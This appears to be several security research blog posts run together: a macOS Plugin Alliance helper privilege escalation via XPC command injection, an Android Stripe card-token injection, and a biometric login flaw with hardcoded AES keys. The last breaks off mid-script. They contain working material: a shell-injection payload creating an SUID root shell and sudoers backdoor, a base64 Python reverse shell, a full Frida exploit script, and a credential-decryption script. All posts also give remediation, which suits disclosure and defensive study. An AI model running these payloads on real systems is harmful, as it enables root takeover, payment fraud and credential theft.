The session was running with the same user as the launching user rather than as root. This is expected with SIP enabled, macOS strips dangerous DYLD_* variables when interacting with system level helpers. However, the fact that the dylib was loaded at all confirms that the helper does zero environment sanitization on its own, and its lack of hardened runtime or a __RESTRICT segment means it remains vulnerable on SIP disabled or misconfigured systems.

To get a clearer picture of what the helper was doing internally, I monitored system logs while repeatedly triggering connections to the com.plugin-alliance.pa-installationhelper service. The logs showed the helper accepting incoming XPC connections without performing any kind of validation or environment cleanup.

Remediation

To properly fix this issue, the InstallationHelper service needs to be hardened so it can’t be tricked into loading untrusted libraries. The following changes would close off the injection path:

• Enable hardened runtime when compiling the helper. This forces macOS to validate any libraries the process loads and blocks all DYLD_* environment variables by default.
• Add a __RESTRICT segment to the Mach-O binary. This prevents DYLD injection tricks from working, even if the environment is tampered with.
• Sanitize the environment at startup, clearing variables like DYLD_INSERT_LIBRARIES and anything else in the DYLD_* family before the helper executes.
• Use sandboxing or additional process isolation where practical to limit what the helper can interact with.

Putting these protections in place make sure that malicious dylibs can’t be injected even on systems where SIP is disabled or misconfigured.

Closing Thoughts

This vulnerability is a good reminder that even small helper tools can introduce outsized risk when they run with elevated privileges. In this case, the InstallationHelper wasn’t doing anything obviously dangerous on the surface but the lack of hardened runtime, missing __RESTRICT segment, and unsanitized environment variables created the perfect conditions for reliable dylib injection.

None of this is complicated exploitation. It’s simply the result of a privileged binary shipping without the modern protections macOS expects. Once those safeguards are missing, normal system mechanisms like SIP become the only line of defense, and that’s never a position a privileged component should rely on.

In the next part of this series, I’ll break down a second vulnerability I discovered during the same research, which builds on some of the themes from the Acustica Audio article.

Happy hacking :)

Disclosure timeline

Introduction

This is post 2 of 2 in my security review of the Plugin Alliance Installation Manager.

Hello again!

This write-up covers another issue I found while looking into Plugin Alliance’s InstallationHelper service on macOS.

While digging through its XPC interface and behavior, I found that the service accepts connections from any local process, skips proper authorization checks, and blindly passes malicious input straight into shell commands. Put together, that means an unprivileged user can get the helper to run arbitrary commands as root.

In this article, I’ll walk through how the vulnerability works, how the service can be reached, and what the exploitation path looks like in practice.

Vulnerability Overview

The HelperTool is a privileged macOS XPC service bundled with the Aquarius Desktop application. Its purpose is to handle system level operations such as installing audio plugin components, managing licenses, and modifying protected directories that require administrative privileges.

During testing, I noticed that the HelperTool service was exposing a publicly accessible XPC interface that fails to properly authenticate the calling process. As a result, any local user on the system can send arbitrary messages to the HelperTool, causing it to execute privileged actions on their behalf.

This misconfiguration leads to a Local Privilege Escalation (LPE). An attacker with standard user permissions could exploit this flaw to gain root access or modify protected system files bypassing macOS’s security model.

Technical analysis

Now, let me explain why the HelperTool is vulnerable, what I observed while reversing it, and why the bug leads to local privilege escalation.

The Plugin Alliance HelperTool is implemented as a privileged XPC service that runs with elevated privileges (the helper binary is installed and launched by the main application/installer). The helper exposes XPC methods intended to perform privileged operations on behalf of the main process (for example: install or remove files under protected locations, write license files, run installer commands or update the application).

During static and dynamic analysis I observed two primary implementation mistakes that together enable the escalation.

The helper accepts incoming XPC messages without verifying the identity or privileges of the caller. Proper XPC security normally relies on checking the caller’s audit token (e.g. audit_token_t) to confirm the bundle identifier or PID matches an expected trusted client or using Authorization Services / SMJobBless style mechanisms where only a signed and authorized process may request privileged operations.

In this helper, the code path that handles incoming requests does not perform an authorization check. Any local process that can connect to the helper’s Mach/XPC service is treated as trusted and may request privileged actions.

Also, the helper constructs command strings and forwards them to the system shell (or otherwise executes them) using APIs that are unsafe when supplied untrusted input. Concatenating user controlled data into a string passed to system() (or equivalent) allows an attacker to inject shell syntax and control execution flow… which turns the XPC method into a remote command execution when the caller is able to send arbitrary arguments.

Combined with the previous issue (no client authentication), this creates a path where a local, unprivileged user can trigger the helper to execute arbitrary commands with the elevated privileges of the helper process.

Insecure XPC Connection Handling

The HelperTool service registers an XPC listener and relies on listener:shouldAcceptNewConnection: to determine whether to allow new clients. In a secure design, this function should enforce strong client validation to verify the connecting process’s code signature, bundle identifier, or Team ID via the audit token.

/* @class InstallationHelper */
-(BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
    if (listener == self.listener) {
        if (newConnection != nil) {
            NSXPCInterface *iface = [NSXPCInterface interfaceWithProtocol:@protocol(InstallationHelperProtocol)];
            [newConnection setExportedInterface:iface];
            [newConnection setExportedObject:self];
            [newConnection resume];
            return YES; // Always accepts
            // […]

No Client Authentication

The function checks only that listener == self.listener and that the newConnection object is non‑null. Beyond these checks, no verification of the connecting process is performed.

No Audit Token Validation

macOS provides an audit token on each XPC connection that includes the client’s PID, UID, GID, and code‑signing identity. Secure services (e.g., Apple’s own privileged helpers) use this to ensure only trusted, signed clients can connect. This helper completely ignores the audit token.

Exposed Privileged Interface

As soon as a connection is accepted, the service immediately sets its exported interface to HelperTool and resumes the connection. This makes the entire privileged API surface accessible to any local process, malicious or not.

Because there is no authentication barrier, any local process can connect to the HelperTool service and invoke its privileged methods. Combined with the checkAuthorization: logic, this reduces the attack surface to “any user to root”.

Broken Authorization Logic

The helper attempts to enforce authorization using Apple’s Security.framework, but the implementation is flawed. Below is the relevant decompiled code from checkAuthorization:command:

/* @class HelperTool */
-(int)checkAuthorization:(NSData *)authData command:(int)cmd {
    if (cmd == 0x0) {
        __assert_rtn("command != nil");
    }

    if (authData == nil || [authData length] != 0x20) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:-50 userInfo:nil];
    }

    if (AuthorizationCreateFromExternalForm([authData bytes], &authRef) != errAuthorizationSuccess) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:cmd userInfo:nil];
    }

    // Retrieves the authorization right string for the requested command
    const char *right = [[Common authorizationRightForCommand:cmd] UTF8String];
    if (right == NULL) {
        __assert_rtn("oneRight.name != NULL");
    }

    // AuthorizationCopyRights is called with NULL reference
    OSStatus result = AuthorizationCopyRights(NULL, &rights, NULL, kAuthorizationFlagDefaults, NULL);
    if (result != errAuthorizationSuccess) {
        return [NSError errorWithDomain:*_NSOSStatusErrorDomain code:result userInfo:nil];
    }

    return 0; // Authorization check passes
}

Superficial Input Validation

The function checks that authData is 32 bytes (0x20) long, which corresponds to an AuthorizationExternalForm. However, this validation is syntactic only. It does not verify that the token is genuine or unexpired.

Broken Authorization Reference

Even if AuthorizationCreateFromExternalForm succeeds, the code never actually uses the resulting AuthorizationRef. Instead, it calls AuthorizationCopyRights with a NULL pointer:

AuthorizationCopyRights(NULL, &rights, NULL, flags, NULL);

Passing NULL here effectively skips validation and results in the function returning success regardless of the caller’s privileges.

Assertions Instead of Enforcement

The code contains multiple calls to __assert_rtn(...) for critical conditions (command != nil, oneRight.name != NULL). In release builds, these assertions are either stripped out or only generate runtime exceptions if triggered. They do not provide meaningful security enforcement.

This means that any local client can present any blob resembling an external authorization form (or even bypass this entirely) and still pass the check. The helper effectively grants root level privileges without requiring a valid AuthorizationRef or rights…

Unsafe Command Execution in exchangeAppWithReply:

The most critical flaw is in the HelperTool’s exchangeAppWithReply: method. Decompiled code shows the following flow:

/* @class InstallationHelper */
-(int)exchangeAppWithReply:... {
    ...
    r0 = [arg0 checkAuthorization:r24 command:arg1];
    ...
    if (r0 == 0x0) {
        // Convert attacker-supplied NSStrings into std::string
        std::string appName = [arg2 UTF8String];
        std::string oldAppName = [arg3 UTF8String];
        std::string appPath = [arg5 UTF8String]; // attacker-controlled
        std::string userName = [arg6 UTF8String]; // attacker-controlled
        ...
        // Construct command string
        var_190 = std::string::append(..., appPath, ...);
        ...
        system(var_190); // first execution sink
        ...
        system(var_190); // second execution sink
        }
    }

The function begins by calling checkAuthorization:command: but fails open (returns success even with invalid or NULL auth tokens). The parameters we can controlled (appPath arg5, userName arg6) are retained, converted to C‑style strings via UTF8String, and then appended to std::string buffers. These buffers (var_190) are then passed directly into two separate calls to system(r0). system() executes its input via /bin/sh -c, meaning shell metacharacters are interpreted. Because no sanitization or quoting is applied, any supplied appPath can inject shell metacharacters (;,&&, |, backticks) into the input like:

"/Applications/TestApp.app\"; chmod 4755 /tmp/rootbash; echo \""

Results in arbitrary commands (chmod 4755 /tmp/rootbash) executing as root.

Impact of Dual system() Sinks

The presence of two distinct system() calls means the attacker’s payload may be executed multiple times within a single invocation. This can be abused to perform a chained sequence of actions like:

1. Dropping a root shell (/tmp/rootbash).
2. Modifying /etc/sudoers.d for persistent passwordless root access.

Proof of Concept

To demonstrate the vulnerability, I developed an exploit that interacts directly with the vulnerable XPC service com.plugin-alliance.pa-installationhelper. The exploit exploit the exchangeAppWithReply: method to achieve arbitrary command execution as root.

Exploit Steps

1. Establish authorization
   The exploit first constructs a dummy AuthorizationExternalForm blob using AuthorizationCreate and AuthorizationMakeExternalForm. Due to the broken implementation of checkAuthorization:command:, the service accepts this as valid even though no rights are actually granted.
2. Connect to the vulnerable service
   The client establishes an NSXPCConnection to the Mach service com.plugin-alliance.pa-installationhelper. Because the listener accepts all connections unconditionally, the connection succeeds regardless of client identity.
3. Trigger command injection
   The exploit calls exchangeAppWithReply: with a crafted andAppPath argument. Unsanitized attacker input is interpolated directly into a system() call, enabling arbitrary shell command execution as root.
4. Privilege escalation & persistence
   Next, 3 steps are being executed: Copying /bin/bash to /tmp/rootbash. Setting the SUID bit on /tmp/rootbash to enable execution as root and writing a sudoers backdoor entry in /etc/sudoers.d/backdoor to grant passwordless root access.
5. Verification
   We can confirm with the presence of /tmp/rootbash (SUID root shell) and /etc/sudoers.d/backdoor (sudoers backdoor entry).

Exploitation

We compile the exploit:

gcc -framework Foundation -framework Security pluginallianceexploit.m -o pluginallianceexploit

Run ;)

./pluginallianceexploit

And we get a persistent root shell:

We can now check the presence of /tmp/rootbash and /etc/sudoers.d/backdoor:

System Log Verification

Using log stream with an appropriate predicate, we can observe the vulnerable helper processing supplied input and spawning shell commands via system():

sudo log stream --predicate 'process == "InstallationHelper" OR process == "com.plugin-alliance.pa-installationhelper"' --level debug

Beyond privilege escalation through creation of a setuid root shell, we can leveraged to obtain a fully interactive root shell over the network!

We can use a Python reverse shell payload that’s base64‑encoded and injected through the vulnerable exchangeAppWithReply: method:

echo 'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3Mu
Y29ubmVjdCgoIlJFREFDVEVEIiwxMzM3KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMu
ZmlsZW5vKCksMik7c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw==' \ | base64 -d | python3; echo "

We execute the exploit again and get a connection back on our VM:

Remediation

To mitigate this, implement strong client verification controls for all XPC connections. This should include validating the connecting client’s code signature and using the audit token for identity checks, as relying solely on the process ID (PID) is not secure. An example of a robust implementation can be found here project.

In addition, ensure that the hardened runtime is enabled and restrict the use of sensitive entitlements. In particular, entitlements such as:

• com.apple.security.cs.disable-library-validation
• com.apple.security.cs.allow-dyld-environment-variables
• com.apple.private.security.clear-library-validation

Should be avoided unless absolutely required, as they can significantly weaken binary integrity protections. To mitigate command injection vulnerabilities, all command arguments must be strictly validated and safely escaped before execution.

Happy hacking :)

Disclosure timeline

During a mobile app engagement, I was going through the payment logic in a popular app using jadx-gui when something unusual caught my attention. A method named postCard(String tokenId) that appeared to accept any Stripe token and attach it to the authenticated user’s account.

The app was leaking its Stripe publishable key, and blindly trusted any card token passed to it regardless of where or how it was generated.

With this vulnerability, a malicious app on the same device, or even just a simple Frida script, could forge a Stripe token for any credit card and have it added to a legitimate user’s account without any interaction or consent.

This post goes into how the vulnerability works, how to exploit it end-to-end using Frida, and how developers can fix it using best practices aligned with OWASP MASVS and Stripe’s own security guidance.

Let’s go!

“To demonstrate the exploitation technique without exposing any client-sensitive infrastructure, identifiable package name and token values have been redacted or replaced with placeholders.”

Vulnerability Overview

At the core of this vulnerability is a fundamental misunderstanding of how Stripe tokens are meant to be validated and bound to user sessions.

In the target Android app, the class PaymentService exposes a method:

public final void postCard(String tokenId, final DataCallback<CreditCard> callback) {
    Intrinsics.checkNotNullParameter(tokenId, "tokenId");
    Intrinsics.checkNotNullParameter(callback, "callback");
    this.api.addCreditCard(new CreditCardRequest(tokenId)).enqueue(new AGRetrofitCallback(new DataCallback<CreditCard>() {
        @Override
        public void onSuccess(CreditCard data) {
            MutableLiveData mutableLiveData;
            mutableLiveData = PaymentService.this.addedCardResource;
            mutableLiveData.postValue(Resource.INSTANCE.success(data));
            callback.onSuccess(data);
        }

        @Override
        public void onError(DataError error) {
            callback.onError(error);
        }
    }));
}

This method blindly takes a tokenId which is a string that typically represents a payment token generated by Stripe and forwards it directly to the backend without performing any validation.

There are no checks on:

• Whether the token was generated by this specific app instance
• Whether it was tied to the currently authenticated user
• Whether it was created by the official in-app Stripe SDK flow

In other words, if you can generate a valid Stripe token under the same account, you can inject any card into any user’s account.

How the App Leaks the Stripe Key

Now, to get the Stripe key, the app leaks its Stripe publishable key in two ways:

Static Resource The key is hardcoded in res/values/strings.xml, which can be extracted via jadx, apktool, or adb. The Publishable Stripe Key in strings.xml is not a vulnerability, it’s perfectly fine for the key to be publicly accessible.

Runtime Access The method SessionService.getStripeKey() return the key at runtime, making it accessible to Frida hooks or malicious apps via reflection or instrumentation.

Here’s the relevant decompiled code:

public final String getStripeKey(Context context) {
    Currency currency;
    Intrinsics.checkNotNullParameter(context, "context");
    Account value = getAccount().getValue();
    String code = (value == null || (currency = value.getCurrency()) == null) ? null : currency.getCode();
    if (Intrinsics.areEqual(code, "CAD")) {
        String string = context.getString(R.string.stripe_key_CAD);
        Intrinsics.checkNotNull(string);
        return string;
    }
    if (Intrinsics.areEqual(code, "USD")) {
        String string2 = context.getString(R.string.stripe_key_USD);
        Intrinsics.checkNotNull(string2);
        return string2;
    }
    String string3 = context.getString(R.string.stripe_key);
    Intrinsics.checkNotNull(string3);
    return string3;
}

This means any malicious code running on the same device can easily retrieve the Stripe key and impersonate the app when talking to Stripe’s API.

Broken Token Trust Model

Once a valid Stripe token is obtained (which requires only the publishable key), the attacker can call:

PaymentService.postCard(tokenId, callback);

This results in the backend accepting and binding that card to the victim’s account, even if the token was created:

• On a different device
• Outside the app (via cURL, Frida, or a rogue app)
• By an attacker using fake card data (e.g., Stripe’s test numbers)

There’s no HMAC, no session binding, no anti-replay mechanism, and no origin validation.

This logic flaw means that any app or process on the user’s device can inject arbitrary cards into the wallet of an authenticated user without their awareness. An attacker could:

• Link a fake or stolen credit card to another user’s wallet
• Farm account rewards or loyalty points using fake purchases
• Potentially set up fraudulent recurring billing (if the app supports subscriptions)

And worst of all—the user wouldn’t even be prompted.

Exploit

With the vulnerability scoped, the next step was to build a practical exploit to demonstrate the impact. Since we can grab its Stripe publishable key at runtime and didn’t validate incoming tokens, it was possible to inject arbitrary credit cards into a victim’s wallet using only Frida and a Stripe HTTP call without any user interaction.

Essentially, the exploit will follow these steps:

1. Spawn the app and wait for initialization. Frida hooks into the running process and waits for the app’s main services to initialize.
2. Launch the AddCard UI. This triggers the app’s dependency injection, bootstrapping PaymentService and SessionService.
3. Extract the Stripe Publishable Key. Hook SessionService.getStripeKey(Context) to capture the key dynamically, or fall back to extracting it from the app’s resources using getResources().getIdentifier().
4. Forge a Stripe Token. Use the publishable key to call https://api.stripe.com/v1/tokens with dummy test card data (e.g., 4242 4242 4242 4242) using an OkHttpClient instance injected via Java reflection.
5. Inject the Token. Locate the PaymentService singleton in memory and invoke postCard(tokenId, DataCallback) directly using Frida’s Java.choose() and a custom DataCallback.

Here’s a the actual Frida script used in the test:

Java.perform(function () {

    const B64 = s => Java.use('android.util.Base64')
        .encodeToString(Java.use('java.lang.String').$new(s).getBytes(), 2);

    const OkHttpClient = Java.use('okhttp3.OkHttpClient').$new();
    let publishableKey = null;

    Java.use('com.REDACTED.SessionService')
        .getStripeKey.overload('android.content.Context')
        .implementation = function (ctx) {
            publishableKey = this.getStripeKey(ctx);
            console.warn('[Stripe-PK] ' + publishableKey);
            return publishableKey;
        };

    function mainLoop() {
        const App = Java.use('android.app.ActivityThread').currentApplication();
        if (App == null) {
            setTimeout(mainLoop, 600);
            return;
        }
        const ctx = App.getApplicationContext();

        const Intent = Java.use('android.content.Intent').$new();
        Intent.setClassName(ctx,
            'com.REDACTED.AddCreditCardActivity');
        Intent.setFlags(0x10000000);
        ctx.startActivity(Intent);

        waitForKey(ctx, function () {
            const token = makeToken(publishableKey);
            console.log('[+] token = ' + token);
            injectCard(token);
        });
    }

    function waitForKey(ctx, cb) {
        if (publishableKey) { cb(); return; }

        const resId = ctx.getResources()
                         .getIdentifier('stripe_publishable_key',
                                        'string', ctx.getPackageName());
        if (resId !== 0) publishableKey = ctx.getString(resId);

        if (publishableKey) { console.warn('[Stripe-PK/fallback] ' + publishableKey); cb(); }
        else setTimeout(() => waitForKey(ctx, cb), 800);
    }

    function makeToken(pk) {
        const Body = Java.use('okhttp3.FormBody$Builder').$new()
            .add('card[number]','4242424242424242')
            .add('card[exp_month]','12')
            .add('card[exp_year]', '2030')
            .add('card[cvc]',      '123')
            .build();

        const Req = Java.use('okhttp3.Request$Builder').$new()
            .url('https://api.stripe.com/v1/tokens')
            .post(Body)
            .addHeader('Authorization', 'Basic ' + B64(pk + ':'))
            .build();

        const resp = OkHttpClient.newCall(Req).execute();
        return JSON.parse(resp.body().string()).id;
    }

    function injectCard(tokenId) {
        Java.choose('com.REDACTED.PaymentService', {
            onMatch: svc => {
                console.log('[*] PaymentService → ' + svc);
                const Callback = Java.registerClass({
                    name: 'x.CardCallback',
                    implements: [Java.use('com.REDACTED.DataCallback')],
                    methods: {
                        onSuccess: _ => console.log('Card added (SUCCESS)'),
                        onError:   e => console.log('postCard ERROR → ' + e)
                    }
                });
                svc.postCard(tokenId, Callback.$new());
            },
            onComplete: () => console.log('[*] Finished – check wallet UI.')
        });
    }

    mainLoop();
});

Now it’s just a matter of running it

frida -U -f com.REDACTED -l poc.js

Once executed, here’s what happens:

1. The app is spawned and initialized. The AddCreditCardActivity is triggered in the background (no UI popup).
2. The app’s Stripe publishable key is extracted either via runtime hook or fallback resource lookup.
3. A fake credit card token is created using Stripe’s public /v1/tokens API and dummy test card info (4242 4242 4242 4242).
4. The forged token is injected into the user’s account using PaymentService.postCard().
5. A new card shows up in the victim’s wallet.

No dialogs, no prompts, no authentication, no biometrics. Just a new payment method silently appearing under the victim wallet.

Malicious App

While Frida makes for a great PoC tool during security testing, what really demonstrate the impact of this vulnerability is that you don’t need Frida at all. Any rogue app running on the same device can exploit this flaw using only standard Android APIs and a bit of Java.

Why It Works Without Frida

• The app stores the Stripe publishable key in res/values/strings.xml making it globally readable.
• The vulnerable method PaymentService.postCard(tokenId) accepts any valid token, regardless of origin.
• There’s no app-bound authentication, origin check, or token signature verification.
• Activities like AddCreditCardActivity are exported, enabling inter-app abuse via Intent.

This means a malicious app installed on the same device can:

• Read the publishable key
• Use it to call Stripe’s API and generate a token
• Invoke the target app’s exported activity
• Inject the token into the authenticated user’s account

All without requiring root, Frida, or user interaction!

public class CardInjector extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        String stripeKey = extractStripeKey(context); // Read from strings.xml
        String tokenId = getStripeToken(stripeKey);   // Call Stripe API

        Intent i = new Intent();
        i.setClassName("com.REDACTED",
                       "com.REDACTED.AddCreditCardActivity");
        i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(i);

        // Optionally, use IPC to invoke postCard() via exposed service
        // Or trigger token injection via side-channel within app lifecycle
    }

    private String extractStripeKey(Context context) {
        int id = context.getResources()
                        .getIdentifier("stripe_publishable_key", "string",
                                        "com.REDACTED.circuitelectrique");
        return context.getString(id);
    }

    private String getStripeToken(String key) {
        // Make a direct HTTPS call to https://api.stripe.com/v1/tokens
        // using standard HttpURLConnection or OkHttp with:
        // card[number]=4242... etc.
        // Return token_id from JSON
        return "TOKEN_VALUE";
    }
}

After this malicious app runs, the victim opens their wallet and sees a new payment method they never added. And because the token was legitimate (created via Stripe’s own API), the backend trusts it without question.

This attack can be fully automated, triggered in the background, and even obfuscated to run on boot or via scheduled jobs.

Recommendations

This vulnerability highlights a failure to properly validate and bind third-party tokens within a mobile payment flow. To mitigate this and prevent similar abuse, the following remediations should be implemented across both mobile and backend components:

• Remove Hardcoded Stripe Keys (Now this is debatable, the publishable key is meant to be access publicly)
• Never store publishable keys in static resources like strings.xml, assets, or shared preferences. Instead, fetch them securely from your backend after user authentication, tied to session/token-based access control.
• On Android, if local caching is required, store them using EncryptedSharedPreferences.

Enforce Token Validation on the Backend

Your backend must not trust client-supplied Stripe tokens blindly. Implement the following checks:

• Token provenance = Validate token was created using your app’s session (e.g., include session/user ID in metadata).
• Single-use enforcement = Ensure each token can only be used once (anti-replay).
• Origin binding = Reject tokens not generated from your frontend SDK or associated IP/user agent.
• HMAC/Signature check = Consider appending a signed HMAC to client tokens using a backend-shared secret.

Stripe supports metadata fields, use them to inject app-validated session context or nonce into the token creation step and check it server-side.

Session & Token Binding

• Introduce a nonce or CSRF token generated by your backend and tied to the user session.
• Require that all card token submissions be accompanied by this nonce.
• Reject any token that lacks a valid nonce or mismatches session context.

Harden Inter-App Communication

Mark all sensitive activities (AddCreditCardActivity`, etc.) as:

android:exported="false"

Unless absolutely necessary. If exporting is required, enforce strict Intent validation using:

• Custom permissions (android:permission)
• Digital signature verification (if sharing within your own app suite)

Instrument Abuse Detection & Logging

• Log unexpected or anomalous token submissions (e.g., duplicate tokens, mismatched session data).
• Track usage patterns of Stripe tokens and flag discrepancies.
• Add telemetry around credit card addition flows that bypass expected UI interaction.

Conclusion

This vulnerability is a good example of how misunderstanding trust boundaries in third-party SDKs like Stripe can lead to high-impact security flaws. By failing to validate the origin, authenticity, and session binding of payment tokens, the application allowed arbitrary credit card injection into any authenticated user account with zero user interaction.

Whether exploited via Frida or a malicious app, the result is the same: unauthorized payment methods silently added to a user’s wallet, leading to potential fraud, compliance violations, and loss of user trust.

Let’s keep this in mind… :

• Stripe publishable keys are not secrets, but they must still be treated with care. Exposing them at runtime or in static resources enables unauthorized token creation.
• Token validation should always happen server-side, with explicit binding to the authenticated session, origin, and user context.
• Assuming the client is trusted is a critical flaw. Any sensitive operation (like adding a payment method) must include validation steps that the mobile app itself cannot forge.

In mobile app security, any assumption that “the app will only be used as intended” is dangerous. If the logic lives on the client and the backend doesn’t enforce the rules, attackers will write their own rules…

Validate everything. Trust nothing. Bind everything.

During a recent mobile app security assessment, I was going through an Android APK using jadx-gui, a routine part of my reconnaissance workflow. As I went through the decompiled classes, one file caught my attention… a service named BiometricService.

Curious, I dug deeper.

What I found was a solid case of broken cryptographic design: hardcoded AES secrets directly embedded in the codebase, including the encryption key, IV, and salt. All used to protect sensitive biometric login credentials. With just the APK and a copy of the app’s shared preferences, I could decrypt a user’s email and password and completely bypass biometric authentication.

To maintain confidentiality, all identifying information about the client and application has been redacted. However, the vulnerability itself is worth sharing. I think it’s a perfect example of how insecure cryptographic practices can undermine an otherwise secure feature like biometric authentication.

This post will walk you through the discovery, exploitation, and remediation of this vulnerability using tools like Jadx and Python, with a focus on real-world attack paths and defensive coding practices that align with OWASP MASVS.

Let’s go!

Vulnerability Overview

While reversing the BiometricService class, things escalated quickly from “mildly interesting” to “critically broken”.

The app was using AES in CBC mode with PKCS7 padding to encrypt sensitive biometric login blobs. Nothing out of the ordinary so far. But then came the kicker: the entire cryptographic stack was hardcoded directly in the source code. I’m talking:

• base64 encoded AES key embedded as a string
• Static initialization vector (IV) reused for every encryption operation
• Hardcoded salt used with PBKDF2WithHmacSHA1 for key derivation

Let’s break this down a bit:

• AES/CBC/PKCS7Padding: AES in CBC (Cipher Block Chaining) mode is deterministic. If the same key and IV are used, the same plaintext always results in the same ciphertext. PKCS7 padding simply make sure that plaintext match with the AES block size (16 bytes), but it doesn’t add any integrity protection. Without an authentication layer (like a MAC or GCM), anyone can tamper with ciphertext silently.
• Static IV reuse: In CBC mode, the IV should be unique and unpredictable for every encryption operation. Reusing a static IV allows anyone to detect when the same plaintext is encrypted, and in some cases, even launch padding oracle or block-swapping attacks. Here, the IV was fixed, making ciphertext patterns predictable.
• Hardcoded salt in PBKDF2: Salts are meant to be unique per user and/or per device to make sure that derived keys are different, even if users share the same password or secret. A hardcoded salt defeats this purpose, essentially baking the same derived key into every single app install.

It was a complete compromise of the encryption pipeline.

Here’s what this looks like in decompiled Java:

    public BiometricService(SharedPreferences sharedPreferences) {  
        Intrinsics.checkNotNullParameter(sharedPreferences, "sharedPreferences");  
        this.sharedPreferences = sharedPreferences;  
        this.algorithm = "PBKDF2WithHmacSHA1";  
        this.secretKey = "tK5UTui+DPh8lIlBxya5XVsmeDCoUl6vHhdIESMB6sQ=";  
        this.salt = "QWlGNHNhMTJTQWZ2bGhpV3U=";  
        this.separatorTag = "[:*:]";  
        this.transformation = "AES/CBC/PKCS7Padding";  
        this.iv = "bVQzNFNhRkQ1Njc4UUFaWA==";  
        this.biometricData = "BiometricData";  
        this.biometricDataEnabled = "BiometricDataEnabled";  
    }

The biometric blob was stored in the app’s shared_prefs directory under the key BiometricData, like so:

“To demonstrate the forgery path without disclosing any sensitive data, I generated a custom biometric blob for the credentials example@example.com[:*:]Password123! using the app’s own encryption logic.”

<string name="BiometricData">
aoZw+lyPI9gjZ/Emgq3FERZPf2qdOJTKP27jpAaVMsezaA1P8dwE9I42q9ZMmUUR
</string>

Having the APK and a single shared preferences file, I was able to extract the user’s email and plaintext password by recreating the decryption logic in Python based on the encrypt and decrypt methods inside the BiometricService class.

Here’s how those methods work:

Encrypt method:

This method takes a plaintext string (like an email or password).

1. Decodes the hardcoded IV from Base64.
2. Converts the hardcoded key string into a char[].
3. Uses PBKDF2WithHmacSHA1 with the hardcoded salt, key, 10,000 iterations, and 256-bit output to derive the final AES key.
4. Initializes a Cipher object with AES/CBC/PKCS7Padding in encryption mode (cipher.init(1, ...)).
5. Encrypts the UTF-8 plaintext and Base64-encodes the result for storage.

    public final String encrypt(String strToEncrypt) {  
        Intrinsics.checkNotNullParameter(strToEncrypt, "strToEncrypt");  
        try {  
            IvParameterSpec ivParameterSpec = new IvParameterSpec(Base64.decode(this.iv, 0));  
            SecretKeyFactory secretKeyFactory = SecretKeyFactory.getInstance(this.algorithm);  
            char[] charArray = this.secretKey.toCharArray();  
            Intrinsics.checkNotNullExpressionValue(charArray, "toCharArray(...)");  
            SecretKeySpec secretKeySpec = new SecretKeySpec(secretKeyFactory.generateSecret(new PBEKeySpec(charArray, Base64.decode(this.salt, 0), NetworkImageDecoder.IMAGE_STREAM_TIMEOUT, 256)).getEncoded(), "AES");  
            Cipher cipher = Cipher.getInstance(this.transformation);  
            cipher.init(1, secretKeySpec, ivParameterSpec);  
            byte[] bytes = strToEncrypt.getBytes(Charsets.UTF_8);  
            Intrinsics.checkNotNullExpressionValue(bytes, "getBytes(...)");  
            return Base64.encodeToString(cipher.doFinal(bytes), 0);  
        } catch (Exception e) {  
            Log.e("encrypt", "Error while encrypting: " + e);  
            return null;  
        }  
    }

Decrypt method:

The decryption method is just the opposite of the encrypt method:

1. Decodes the same hardcoded IV.
2. Derives the AES key using the same hardcoded inputs and PBKDF2 parameters.
3. Initializes the cipher in decryption mode (cipher.init(2, ...)).
4. Base64-decodes the encrypted blob and decrypts it, submit the original plaintext string.

    public final String decrypt(String strToDecrypt) {  
        Intrinsics.checkNotNullParameter(strToDecrypt, "strToDecrypt");  
        try {  
            IvParameterSpec ivParameterSpec = new IvParameterSpec(Base64.decode(this.iv, 0));  
            SecretKeyFactory secretKeyFactory = SecretKeyFactory.getInstance(this.algorithm);  
            char[] charArray = this.secretKey.toCharArray();  
            Intrinsics.checkNotNullExpressionValue(charArray, "toCharArray(...)");  
            SecretKeySpec secretKeySpec = new SecretKeySpec(secretKeyFactory.generateSecret(new PBEKeySpec(charArray, Base64.decode(this.salt, 0), NetworkImageDecoder.IMAGE_STREAM_TIMEOUT, 256)).getEncoded(), "AES");  
            Cipher cipher = Cipher.getInstance(this.transformation);  
            cipher.init(2, secretKeySpec, ivParameterSpec);  
            byte[] doFinal = cipher.doFinal(Base64.decode(strToDecrypt, 0));  
            Intrinsics.checkNotNullExpressionValue(doFinal, "doFinal(...)");  
            return new String(doFinal, Charsets.UTF_8);  
        } catch (Exception e) {  
            Log.e("decrypt", "Error while decrypting: " + e);  
            return null;  
        }  
    }

Because the cryptographic materials were static and globally reused, anyone could craft valid encrypted blobs and inject them back into the app, impersonating other users and bypassing biometric checks altogether. it was a full-on authentication bypass.

Exploit

Both of these methods were essential to build a working exploit script outside the app. Because the encryption and decryption flows were symmetric and completely deterministic (use of static keys, IV, and salt) it was just a matter of building the logic in Python.

From these methods, I could work out:

• The KDF parameters (PBKDF2-HMAC-SHA, 10k iterations, 256-bit output)
• The block cipher mode (AES/CBC/PKCS7Padding)
• The exact structure and format of the inputs and outputs (Base64, UTF-8)

With that information, the script became a simple translation of the Java logic:

• Load the hardcoded values
• Derive the AES key with hashlib.pbkdf2_hmac
• Decrypt the Base64 blob using PyCryptodome’s AES.new(...).decrypt()
• Unpad and decode the result to reveal the plaintext credentials. Money.

#!/usr/bin/env python3
import base64, argparse, hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

SECRET_STR = "tK5UTui+DPh8lIlBxya5XVsmeDCoUl6vHhdIESMB6sQ="
SALT_B64   = "QWlGNHNhMTJTQWZ2bGhpV3U="
IV_B64     = "bVQzNFNhRkQ1Njc4UUFaWA=="
ITERATIONS = 10_000
KEY_LEN    = 32

ap = argparse.ArgumentParser()
ap.add_argument("--blob", required=True, help="Base64 BiometricData value")
args = ap.parse_args()

